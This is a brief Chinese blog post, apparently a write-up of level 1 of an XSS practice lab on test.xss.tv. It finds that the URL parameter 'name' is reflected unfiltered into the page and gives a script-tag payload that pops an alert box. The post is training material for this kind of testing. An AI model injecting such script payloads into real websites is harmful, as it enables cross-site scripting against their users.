XSS level--1

2017-06-20  本文已影响0人  Alisita

Author:Alisita

观察URL,
http://test.xss.tv/level1.php?name=test
输入点就在URL里面,参数是name
输出点在页面
这一关没有任何过滤,很简单
所以构造payload
<script>alert('xxs')</script>

上一篇 下一篇

猜你喜欢

热点阅读